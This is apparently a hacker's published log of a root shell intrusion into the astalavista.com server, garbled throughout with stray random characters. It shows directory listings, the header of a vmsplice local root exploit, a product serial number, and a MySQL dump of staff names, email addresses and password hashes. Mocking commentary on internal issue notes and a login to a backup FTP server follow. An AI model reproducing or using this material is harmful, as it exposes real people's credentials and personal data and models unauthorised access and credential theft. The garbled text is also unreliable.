. a" p# @! F! ~$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
* a- }" p. k& v- p: Y( Z+ ]?>
3 v* g1 B6 r- H p s
" B% w0 Z2 E! L& W8 M7 Lsh-3.2# cd ..
6 U! O0 g# X0 m# R2 ash-3.2# cd com8 h g4 }, `- E4 ]" w
sh-3.2# ls -la
' r- n6 F1 Z6 x. c" Y. {( atotal 141208% S# t8 y( f2 i# @$ }6 @& y. i! K
drwx–x–x 10 com com 4096 Apr 28 12:40 .$ h! I y/ z% I6 d
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..1 S& o! p. G* L5 z; u
drwx—— 2 com com 4096 Jun 4 04:04 backups+ r1 x3 r! L2 n! N: H
-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql
: h& f( ^2 c8 N3 P8 ^. N) vdrwxr-xr-x 2 com com 4096 May 12 15:20 backup_system
! [) v- ]) o; q-rw——- 1 com com 21880 Jun 2 08:07 .bash_history
, r5 B3 W6 j4 ]! h9 D$ Z' r$ p5 w-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout
0 }3 Z, e! q) m6 P7 K' ^-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile
) C# q- Q1 O. L4 n-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc
# Q; @$ G! p6 f4 m; rdrwx–x–x 3 com com 4096 Jan 29 2008 domains
5 p$ n* H3 }* ?-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed/ l2 Y! p3 Y. q8 N" }
drwxrwx— 3 com mail 4096 Jan 6 19:24 imap
, I% T ]( M8 v$ _8 Q-rw——- 1 com com 69 Nov 18 2008 .lesshst# l- X, X- \+ ]7 V0 G4 V4 `
drwx—— 2 com com 4096 Sep 24 2007 mail' I, d9 t5 C Q$ `" i5 O) X
-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history9 P+ H( E2 H0 S+ p8 }
drwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp
- M0 L/ p) l9 n" x K" tlrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html, z7 i& x+ M& ]' b2 Y
-rw-r—– 1 com mail 34 Sep 24 2007 .shadow s8 R. O9 h# Y8 X9 G8 w0 X% |
drwx—— 2 com com 4096 Aug 26 2008 .ssh
0 N# \3 s$ D6 |2 u-rwx—— 1 com com 8515 Feb 10 2008 t# I) g8 \1 G8 G) [! B# j
-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c
" I0 l" ?1 Q1 @; V5 ldrwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp
4 V% S4 c9 ^( t. z' j-rw-rw-r– 1 com com 617 May 20 2008 .toprc
- |4 Z: ?. f4 a+ s0 g# ?) k6 ]1 R-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql* W; v1 U# V, U( O7 i
-rw——- 1 com com 16629 Mar 28 21:46 .viminfo; c0 Q0 I: d2 i
-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc+ u/ ]' I" p! b$ i0 g4 S5 k
# d7 c" j3 M7 c, M A0 X$ gsh-3.2# head t.c
- }0 Y# W @' ^$ h& _- _7 ^/*
* e. B# \4 J0 j; b* jessica_biel_naked_in_my_bed.c% Y- }" X) C- H" T$ [
*
@9 {$ A8 I( w4 h( @* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.9 n" \. `" z6 J& r
* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.) A% ]" S1 y# S0 q+ d* V$ @* U( ~
* Stejnak je to stare jak cyp a aj jakesyk rozbite.
0 E8 Y" l8 \1 K7 M" T*
; z! W% T* F4 {& A* Linux vmsplice Local Root Exploit
6 Q- n( U( p0 f, p. d( H) ?8 r* By qaaz
% \$ L5 G: b+ G% _*" n( r% w5 y1 y7 p/ A
, ~1 Z' I- l2 O8 c" U+ M
sh-3.2# cd /" T O% r& I( C' p- g) W: v J
sh-3.2# ls -la- s( r4 A) o9 n9 @: W; u
total 360
* ]' \9 l6 r4 }9 R1 `; ldrwxr-xr-x 25 root root 4096 Jun 3 02:43 .
: b' X7 K0 f+ k, D3 o0 adrwxr-xr-x 25 root root 4096 Jun 3 02:43 .." p! N* K! ~$ L
-rw——- 1 root root 10240 Jun 3 02:39 aquota.group
Q1 y6 x+ {4 A0 C) i1 ] b/ Y-rw——- 1 root root 10240 Jun 3 02:39 aquota.user" y8 N) e3 E- B p
-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db5 n, j9 E5 _& L. M* {
-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck
3 W% r! S" @% p) R; I-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel# } q9 s& v& M5 f5 M8 H$ f
drwxr-xr-x 3 root root 4096 Dec 29 2007 backup+ p f8 I$ E" z" V2 @9 A6 X7 O
drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin
( K1 |1 {" {9 [& r, c: s' hdrwxr-xr-x 5 root root 4096 Jun 2 14:06 boot
& R, c1 P0 M" X' \+ D/ Sdrwxr-xr-x 11 root root 3620 Jun 3 02:43 dev) ^/ w, d- P9 ^5 Z& m
drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc" R& I% T0 G Y- `1 S4 |& ]
drwxr-xr-x 14 root root 4096 Mar 11 17:56 home9 A0 n" g$ K3 x5 @7 a5 y) r; `
-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf
# O5 E- |9 h5 tdrwxr-xr-x 11 root root 4096 Jun 4 04:02 lib: ~+ r8 X, }3 a# E0 A# }7 Y
drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib648 h: J- n3 t G0 \; z* O Y; m
drwx—— 2 root root 16384 Sep 11 2007 lost+found
7 V' W7 j' l3 q {3 }% W. ]drwxr-xr-x 2 root root 4096 Mar 11 17:56 media8 [! i; `) {9 a3 o9 _; l7 R- B
drwxr-xr-x 2 root root 0 Jun 3 02:43 misc
; u a! W7 i1 b$ _6 ^! L/ F6 O6 Mdrwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt, }" x+ Q; Y: c! Q: a/ A' X( X* o( }
-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg7 e$ o3 N7 |0 l) V/ y" ~
drwxr-xr-x 2 root root 0 Jun 3 02:43 net! M; W2 t: H' S5 C* c/ ]
drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt
. V. B) A; u8 {* |9 B4 g. ]4 \+ G4 bdr-xr-xr-x 264 root root 0 Jun 3 02:42 proc8 S1 b7 G/ v* W+ T1 [" h
drwxr-x— 15 root root 4096 Jun 4 08:40 root2 ~: a6 m8 C2 O# h
drwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin
" v8 ^5 j4 w& }$ @8 e8 T- g' C( Hdrwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux/ }5 U# D3 y. F
drwxr-xr-x 2 root root 4096 Mar 11 17:56 srv
5 A7 f3 |8 D& ^+ U0 E& ddrwxr-xr-x 11 root root 0 Jun 3 02:42 sys
$ k; }4 i0 x1 R; A2 rdrwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp" B' @7 z. A* ~+ D* T: f" C
drwxr-xr-x 16 root root 4096 Jun 2 13:56 usr. s$ K( \- \, ?5 q+ r' z
drwxr-xr-x 26 root root 4096 Jun 4 03:16 var" m* g+ f% s9 V! w0 m
, e& v+ C7 l) v4 |' G/ l
sh-3.2# cd opt' j7 h$ {5 o2 b5 I2 ~3 v
sh-3.2# ls -la" _" |; M) k1 k, m b4 z
total 205 B/ s6 d) O& s+ O& R% y D0 o5 b
drwxr-xr-x 3 root root 4096 Mar 11 17:56 .9 }! M) C& ]4 ?9 \" m' F
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..+ Z/ e& g2 l/ x6 Z+ y+ o Z
drwxr-xr-x 15 root root 4096 Mar 20 2008 lsws2 w* T7 }- k6 i6 k) a$ N
. ^ _* O5 P, i5 B- C( n% ^) ]
sh-3.2# cd lsws/* ^" e r; _! R' f
sh-3.2# ls -la
$ S5 @8 x5 I f; jtotal 108
9 Q% l: \" q, n5 q$ S+ e3 odrwxr-xr-x 15 root root 4096 Mar 20 2008 .1 \( Y+ g) }# {9 N1 G h/ w! |8 R
drwxr-xr-x 3 root root 4096 Mar 11 17:56 ..% w* m/ d; o- F7 ?; g: ?5 T
drwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons+ o" [8 @2 c2 n) E1 N
drwxr-xr-x 13 root root 4096 May 29 15:10 admin) h# S# z: ~/ I% Q. M
drwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate" P9 |" G$ j- z: b% Y/ d) N S: W
drwxr-xr-x 2 root root 4096 May 29 15:10 bin
4 \% O( y- @0 \! E* sdrwx—— 4 apache apache 4096 Jun 3 02:43 conf# z1 g+ L# @1 @
drwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT) @) w. h% f. J$ F+ T" l4 L" c# e
drwxr-xr-x 2 root root 4096 Sep 15 2008 docs @- j6 i- u; e; X
drwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin
7 a b0 F: G7 n. ^0 Y; `8 tdrwxr-xr-x 2 root root 4096 Sep 15 2008 lib
3 V9 L! M9 b+ W. u-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE
, T; p1 \( s- ?5 H0 K# Z" g-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP
- V4 [- I. Q9 X" X-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL, e7 p, t' p9 D# n
-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP
/ H& a) W: P$ ?% d& y, [drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs5 G K- U J0 B3 n g3 z% _) ]
drwxr-xr-x 2 root root 4096 Mar 20 2008 php
2 S9 e4 y$ _. k* g. ^$ F' |' i. C" tdrwx—— 2 apache apache 4096 Mar 20 2008 phpbuild, C1 [% F. W/ R; G
drwxr-xr-x 3 root root 4096 Mar 20 2008 share
* s+ U" D& t' ?' C, x2 G9 u-rw-r–r– 1 root root 6 May 29 15:10 VERSION: h" \* v* \ ]! e2 X
6 x: H3 t% _; w- Y
sh-3.2# cd conf* z! {2 i3 E- K2 ~* E
sh-3.2# ls -la9 a/ F1 }, c0 {, w* n$ i
total 48
- S/ B2 ?* r% ]4 ]: @3 ~drwx—— 4 apache apache 4096 Jun 3 02:43 .
) ?9 p [0 T' C; y8 Z3 X5 Bdrwxr-xr-x 15 root root 4096 Mar 20 2008 ..
' c* v% ]; U; E* ^8 D6 k! z6 [. [drwx—— 2 apache apache 4096 Mar 20 2008 cert4 l/ T! F/ a3 y6 c: A% t
-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml
; s* @' @( e+ B) M-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak
0 ]# K- H$ A/ u6 |& {7 i-rw-r–r– 1 root apache 0 Jun 3 14:11 .last# H; I$ s/ C& p& [
-rw——- 1 apache apache 256 May 29 15:10 license.key* R3 F; C3 D' o
-rw——- 1 apache apache 256 Mar 21 2008 license.key.old9 h6 J! ^* x5 w$ M+ m2 F) r
-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties: A, w7 {1 h- Z h8 e- }, F7 y7 Q& o
-rw——- 1 apache apache 20 May 29 15:10 serial.no9 S. x) j+ `2 @. D) I
drwx—— 2 apache apache 4096 Mar 20 2008 templates% n$ q; B6 f5 V
' u9 f* H2 o! X' L, \9 Esh-3.2# cat serial.no: a% ?+ e) V( K: ]
IbDl-oVsO-CKqL-wVRa* q( a9 N4 ~6 Y: E/ p% ]0 X
5 z3 v3 G( D( }! t. n
sh-3.2# mysql
& H0 }9 |* H3 Q# s1 zWelcome to the MySQL monitor. Commands end with ; or \g.. F, T! s. [1 q& _
Your MySQL connection id is 286844
3 e0 I' m7 A' g- b1 J+ q8 YServer version: 5.0.45-community-log MySQL Community Edition (GPL)
2 T2 } N$ q# p4 E' T' g/ L" f3 J7 H& f9 i3 t- m- m# i8 A5 W
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
+ s5 r: V: A, J6 W$ N/ t
0 _9 M1 R: U. cmysql> show databases;
4 O2 e2 P7 Q- G" _ J+———————–+
4 s3 E% u; ?9 p' Y3 r| Database |
- I3 `: \) s2 \; |& t; l) h9 J+———————–+
' N5 n" j" X( W' H# ~| information_schema |4 x% \+ C# g' S# c3 g
| astanet_ads |
2 ~2 ?* k& W- v+ \$ w| astanet_mailing_lists |: W2 K4 d3 S( X9 x6 f
| astanet_mediawiki |( ?- r5 P) q" H# X# z. F. Z
| astanet_membersystem |
% j; {, i/ e0 D, T% o| com_contrexx |" y8 s6 P; Q1 @: U1 z
| com_contrexx2 |- q( Y/ w# Z% K" o: k
| com_contrexx2_live |. ~7 h, ~/ v1 A5 N) L
| da_roundcube |' I3 r& b T4 k6 h2 L( n
| dolphin |+ j4 J- g9 @+ u# r$ a) h
| ideapool |
! V8 j+ T/ K% A/ A| mysql |
- P2 f' E* H9 S& b+ I4 ]$ e| test |
/ C. v/ |) j4 t: Z* L0 @| yourmaster |
2 B, p/ T$ ^ Z$ \. ^% w9 @+———————–+
( W. r5 {8 v1 K, i$ ^5 U14 rows in set (0.00 sec)# }2 `4 y. ~9 `4 P$ P% Z$ Q, [
9 f/ A1 r3 }" C3 A* G$ V3 Wmysql> use ideapool h; v* [9 a1 C% G! Z1 W
Database changed' B2 z! N0 d/ i- J; o, V k
mysql> show tables;
; \ i+ F$ v. }. i8 x+———————————–+
+ b1 Z v3 {2 T: m0 x| Tables_in_ideapool |
5 a/ x8 [0 r+ h. p: ^( f7 P+———————————–+# P+ [# k, b1 k* |+ h" `* U4 u
| eventum_columns_to_display |8 N% l. v: T( @, k! C, k: {
| eventum_custom_field |
% {, K8 h _$ D9 J& F| eventum_custom_field_option |
$ X# N1 |& l) t# o6 o5 E4 z$ T/ K7 O+ c| eventum_custom_filter |
. I' U6 ]+ h. m' o4 u| eventum_customer_account_manager |
$ G; ~6 _8 H |: j* g| eventum_customer_note |
$ u7 l4 ]% d. W8 R9 l| eventum_email_account |" ~( d$ P) ~2 I" u8 Z% C
| eventum_email_draft |
9 e" y/ }' W7 u% W0 C9 O, S| eventum_email_draft_recipient |3 w2 W2 Y1 v r+ V
| eventum_email_response |# v0 j4 j$ G: n5 r
| eventum_faq |2 ~' [! q7 d) u
| eventum_faq_support_level |. S6 L' Q1 J$ j4 f' ]1 `
| eventum_group |
H! E# H9 ~8 f$ I/ Y# ~. C| eventum_history_type |) N8 C0 a+ q B
| eventum_irc_notice | K, t3 @# o! X/ u2 Y: Y
| eventum_issue |( n' Q3 x# x2 ~1 p# M* q. ^
| eventum_issue_association |
: h7 ~9 o" S0 O| eventum_issue_attachment |7 M" U. h8 s2 v3 y
| eventum_issue_attachment_file |
1 d! J; ~5 ~7 J) u% W| eventum_issue_checkin |9 f) u" A$ Q. V% W5 {; v. c
| eventum_issue_custom_field |
( i" @1 N5 V+ E# g. `| eventum_issue_history |
2 J0 U, N4 y5 \ i- c, N| eventum_issue_quarantine |
' L h! ^' L% t4 S4 [| eventum_issue_requirement |
1 g1 x* o% @% v2 I( b| eventum_issue_user |0 W% g2 [ b$ |& [! T
| eventum_issue_user_replier |
1 X7 [5 G8 g" {7 U| eventum_link_filter |
7 E3 E3 e G6 `" f9 r8 T. r| eventum_mail_queue |: P0 v* Q4 ?3 ~. k- i) ~/ s
| eventum_mail_queue_log |
& k# @ `% V9 V! `2 n| eventum_news |- e: E% [+ Y# B3 x; d; A
| eventum_note |
& \7 g4 L0 A/ N) q* I| eventum_phone_support |
k G `9 j0 _/ @9 J5 t| eventum_project |# \5 S: p: H( w s; @, c8 z% u
| eventum_project_category |
+ y0 J2 j, q' z: }3 k: i1 r) n& {| eventum_project_custom_field |
% n; g) k8 u6 w: E: i5 h+ q* \1 y| eventum_project_email_response |
+ C& k' u, u: G1 z* `% s: Q. v$ u d| eventum_project_field_display |3 u. w" @. |/ ^
| eventum_project_group |* d% \ [4 o! a3 i! `
| eventum_project_link_filter |
+ P3 w! b3 B- i6 g& s5 @| eventum_project_news |* k3 V! j$ [+ C+ p
| eventum_project_phone_category |
* V* T& z$ e, j: H/ r7 B& }| eventum_project_priority |4 r9 ~/ O# j8 k8 {1 p
| eventum_project_release |7 @1 |3 P- q0 s* }, P
| eventum_project_round_robin |- z6 a( f8 O* Q( i# r: ^
| eventum_project_status |* T. j! m- k) E$ H8 ]
| eventum_project_status_date |
$ D5 }( W5 |, N( e| eventum_project_user |
# l( C8 A+ Y, ~3 \) d) P| eventum_reminder_action |
$ S2 D) {4 Z4 y! J| eventum_reminder_action_list |
# d. I- d" `; r1 b. j+ b| eventum_reminder_action_type |6 T3 V5 y- M) Y1 `" k
| eventum_reminder_field |; \0 t+ s P( M6 ~: v9 b, _6 H+ G
| eventum_reminder_history |
$ o# f% @2 B" O2 q. |, e. a" {: r| eventum_reminder_level |4 V' u- t/ B$ Y( g( Y
| eventum_reminder_level_condition |3 F0 B8 H! T/ G0 s& p! E
| eventum_reminder_operator |
* y& r+ ^$ e/ c| eventum_reminder_priority |
7 N Q$ J; A8 x, N| eventum_reminder_requirement |
' m8 W; }* q+ z ]3 f+ x, b| eventum_reminder_triggered_action |( ]" y/ b- j# E( M
| eventum_resolution |
2 ^2 p ~- [4 S* O| eventum_round_robin_user |
+ \ R! W) ^, R, n; U. k" \$ T| eventum_search_profile |
# d$ Y5 o# f2 S, O| eventum_status |' x" v" ?. C! S( l+ U
| eventum_subscription |( P1 |2 U5 I. {4 x0 Z( G. d7 S* K# b
| eventum_subscription_type |. z9 \; K2 ^+ _. ?; n
| eventum_support_email |
8 F7 b2 ?- R' U% f% E| eventum_support_email_body |
$ `% T" i9 N h# C2 _3 J/ e| eventum_time_tracking |
% M; Y7 z x7 U- u8 l* _$ i| eventum_time_tracking_category |( R: [) F( n# G* W( m# L$ P
| eventum_user |% ]2 o" c9 q: _5 Y1 t# Y! c9 R+ h) m
+———————————–+; f. t; q2 A; _5 y+ ]+ T
69 rows in set (0.00 sec)& Q* B3 A" g- |0 W- Q ^/ Q: l* `7 {
6 z* r% C# Y7 O/ P" s3 O- O$ u Cmysql> describe eventum_user;
- m2 C& O& u7 U% D( i+————————-+——————+——+—–+———————+—————-+ W1 W' K1 r% k7 ]' E/ w' n
| Field | Type | Null | Key | Default | Extra |9 P, f3 Z1 I" P3 I) ^! n" z
+————————-+——————+——+—–+———————+—————-+/ M6 z# [. `$ W- q" _1 e( K
| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |
! p, c& a$ e( U3 }* h6 g" W U: B+ l" @| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |
! a# n) d9 z/ V) B3 E/ K| usr_customer_id | int(11) unsigned | YES | | NULL | |
; b' ` d* Z/ b5 X/ V| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |
8 n0 X$ x: f# N' l| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |
. j. |: |7 [/ I7 A$ |, O| usr_status | varchar(8) | NO | | active | |
# y" }& @$ B# G| usr_password | varchar(32) | NO | | | |
- C! I+ X7 [0 J. N" Y Q| usr_full_name | varchar(255) | NO | | | |
/ f7 A# O9 [% H| usr_email | varchar(255) | NO | UNI | | |+ w1 c5 o3 M% o$ U1 t
| usr_preferences | longtext | YES | | NULL | |
: |) T1 b# l5 _% T| usr_sms_email | varchar(255) | YES | | NULL | |- s: m3 J3 G+ h4 N' \0 |5 X
| usr_clocked_in | tinyint(1) | YES | | 0 | |+ g3 T0 p7 Y3 v9 G k- C+ b- e- J
| usr_lang | varchar(5) | YES | | NULL | |
& ^- g D! G8 F# r7 ]$ L+————————-+——————+——+—–+———————+—————-+
; `6 E/ z) d) Z. l+ O5 o13 rows in set (0.00 sec)
- i' o" E3 O F( q: P! ], F. i0 \0 o, I
mysql> select usr_full_name,usr_email,usr_password from eventum_user;. ?- x4 u+ @# F1 l
+———————-+——————————-+———————————-+
. e# ~- O5 G0 f# Q9 I| usr_full_name | usr_email | usr_password |
7 e2 v9 c+ q3 N+———————-+——————————-+———————————-+( {1 E) I) {7 e( K) W& I5 f
| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |
9 J9 L2 y/ ?1 X* G+ `| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |3 y s' g. o0 `3 _- u
| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |
$ n( x; _8 {* b' e| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |! o. m9 F0 X6 u5 D$ R8 b
| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 | B- |2 a. U9 A1 {) h- K& {
| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |: s! o7 _5 k0 e* q5 h# ]
| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |, k3 B9 K \7 H' u1 @" Z* Z
| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |# |- K3 D/ [( x5 d6 a: D9 h
| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |: z1 F9 U2 K! ]' w/ }) O' y
| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |1 A! d' N p( }; g5 H
| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |
* ~/ t5 o @( L8 d| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |) U! ]3 ~. ^/ S. N
| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |
J5 c5 r6 i- r9 l| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |; I4 F0 a) |3 d
| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |8 H# O0 e: ]8 c! W& C
+———————-+——————————-+———————————-+
) j0 l+ W& `8 U* D$ C0 x; D6 K a% X15 rows in set (0.00 sec)/ d& L. a! B: B, `8 O/ t) t* @
. E, K& F3 p0 `$ K) m9 [5 l
mysql> select iss_description from eventum_issue where iss_id = 43;
4 E$ i* L4 @1 B+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+; S( I' k) C, F {9 p4 Z- @) e
| iss_description / f5 A* F q# a* M, @" ?) }
|
: k! u; l9 R% K+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
* O# f2 ]6 A/ y3 F| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be9 v5 ~- M& k/ Z7 k/ F
connected for 90 mins… 120mins… so what i propose is something like:
; k/ w4 ~0 D$ e' V0 D" ]9 p; L8 {链接标记[url]http://www.surfthechannel.com/[/url]& v& }6 U# y/ ]' H w9 ]
since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system
' D4 g; V! }/ q0 g6 ylike podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t# Z7 }8 T% R. _: a6 y9 T
break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off
7 z% I0 p; w) @" S vif they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…. g4 @9 f/ U9 l" |% G8 x
5 s/ I8 I6 H' P) J _We could also put advertisement during play on the flash video player itself… extra $$…3 V3 P9 C9 n' A
# X7 Z3 s2 W1 y2 U$ n. y5 jBy sykadul |
! A9 Q$ F. a7 F! Q. ?2 |4 g% {+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
! ~% w7 x: S$ f- y+ t1 row in set (0.00 sec)
6 y9 z9 C! i6 j7 Z/ T' M
6 X# I3 W8 U( w1 E1 a; l5 l9 y// Money and extra $$ is all they care about. remember that.
, L! h1 [* ~1 E. l1 c2 g
$ p) e; h4 ^: m ~5 s# s" @" l! k8 Y' Gmysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
+ k! r: v7 }8 k5 X+ N7 H0 ^+————————+——————————————————————————————————————————————————————————————————————————————-+' s3 w, l+ W+ E% j8 A4 @4 o$ [" d
| iss_summary | iss_description 0 s5 P3 n& i* x2 a
|( M# I8 W& @( Z& U% i9 X! s8 q/ e( J
+————————+——————————————————————————————————————————————————————————————————————————————-+
' X1 t: H3 t% V, l' w| Forum for REAL EXPERTS | Hello,3 ]- w9 S. I% B7 s
A' p/ d$ E6 d0 O; \: U! L7 r# J8 L
Ishtus and I," _' l6 G, F# l- }" K
* ~3 J- P, T- P$ k6 F# j' |Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide: q( Q1 V5 e+ h5 T/ C, Q5 Z, D
ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..% H) j% F+ e, Q; r* U" O7 w9 X) Z3 s
4 }7 }/ B, e" L, C, t: h4 h; `
One example a friend of mine from coresecurity.com!
$ J; e; @& u8 ^& c
2 }3 o9 T4 e8 R! H! A0 nWe could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..
: `' i' U: K! c9 y
2 K" S# s) B6 y; D [|
, r; N+ n: z9 J; B* n1 ^' c; k O+————————+——————————————————————————————————————————————————————————————————————————————+
+ r' S$ ~* X- _ L3 M6 t8 H1 row in set (0.00 sec)5 [+ O, D2 s" Z
) {' y Z3 q8 p// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…7 e7 |% s/ ^; [8 o8 H
9 \- m' ?6 x8 K1 W
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;) b/ x Z$ b7 _) N8 t
+——————+———————————————————————————————+) Z% c5 ?' i8 ^; n
| iss_summary | iss_description |
2 m! H2 F1 y$ `$ N+——————+———————————————————————————————+6 g. q; R" U( P: o: N
| Website guidance | Virtual Girl which guides you trought the website.# w% ~. M: |+ N% ?
; |" r3 _' y5 x. e, @6 u+ J5 {( T
We need a girl with who you can ( talk )!!!
0 N" F2 j ]( ?' S" m3 p$ HAlso for the News!
* i7 X( r$ Y2 N9 v% W- k( o( eSo my suggestion is a girl who read you the news loud if you like!) F. D0 }8 o1 t4 q1 Q* z0 a9 J
you can choose between read yourselfe or she read it for you or both!
3 D2 D4 \8 c ^
, e) I# y+ a2 O! p0 v' s/ J8 iGo to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!/ l9 r3 \9 l+ b7 D# n7 ^) u8 _1 t
* H ]+ e9 C1 u: f: K9 ]& hHave a look on the example girls!!4 U, C6 _% _% [, W
8 V6 t, ?, c& C3 M; `
链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]' p" p4 E! D0 D8 ~( ^! Q" g
6 w- N. t+ w+ o3 c, e/ l. D- A
or that. R* ~& o; g% x+ g# x9 E! J
1 s& E- a. ]* ]3 _1 g9 P& K
链接标记[url]http://www.yellostrom.de/[/url]+ |- F6 v' S8 ~; o
; s4 U" a4 `' p+ F, B
|
% f% M3 K& P7 N+ K$ V! _; D% z* ~/ ^+——————+———————————————————————————————+
) e+ ]% S: Q2 a; i4 n- }) T9 j/ W$ q1 row in set (0.00 sec)
8 p5 P6 M+ L! v$ `6 y: p- _0 @7 u! d! \: _
// ha ha.3 c% T- c/ v) L+ M$ ^* K
4 l H4 B2 w& f* Z7 _1 y, ~+ I; b' ~mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
9 B% S4 [- ]6 ~4 m% }, }+————————–+———————————————————————————————————–+' y2 `1 g3 l+ j; \( u
| iss_summary | iss_description |8 }5 a2 p- _' N( F k! y( t9 Y5 V
+————————–+———————————————————————————————————–+
( Q% n) Q4 z% P| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |
; e+ ^0 `0 Y2 d+————————–+———————————————————————————————————–+
1 N, I; x8 u* k4 {2 C/ Z) g1 row in set (0.00 sec)7 n# t" F( ?5 d( P1 F% ?2 q# w
3 @: a4 b0 k# A) [6 F& l) B// LOL.6 u$ l5 M" \* ?
+ p9 ^7 m8 J5 K7 {mysql> exit! t. X- G2 _) Q" P2 j; S
Bye0 Q9 K! J- ]! c/ a% f% }, D8 R
7 Z# |4 X- u7 g! x3 D/ [6 }8 ^% zsh-3.2# ftp 212.254.194.1632 Y1 T2 h/ u+ w7 [7 E$ Q6 P
Connected to 212.254.194.163., x3 Z, E5 y7 w( D( X# P* Y
220 BackupCOM_VW FTP server ready." d$ q+ S& q# R# a8 u
504 AUTH: security mechanism ‘GSSAPI’ not supported.1 D8 n0 |7 ^& _! V) W* h; ]
504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.& Z. o8 Z' v+ k* w1 U1 r# ~; [- I( i
KERBEROS_V4 rejected as an authentication type
$ D5 S0 [7 J+ B4 X1 G& V3 qName (212.254.194.163:root): astalavista.com
B, _2 ]4 ?: O: i: x" o, U331 Password required for astalavista.com.7 f8 V2 [& p; z& n/ P% R" U) u
Password:. O; E4 s$ v2 r' m
230 User astalavista.com logged in.& O6 i* x+ I/ V% Y& W) v2 e
Remote system type is UNIX.8 s9 W" Q4 F) @% U$ O' \$ Q" g& J
Using binary mode to transfer files.# q6 \% m# V6 h& r* g$ S5 G7 |' ~
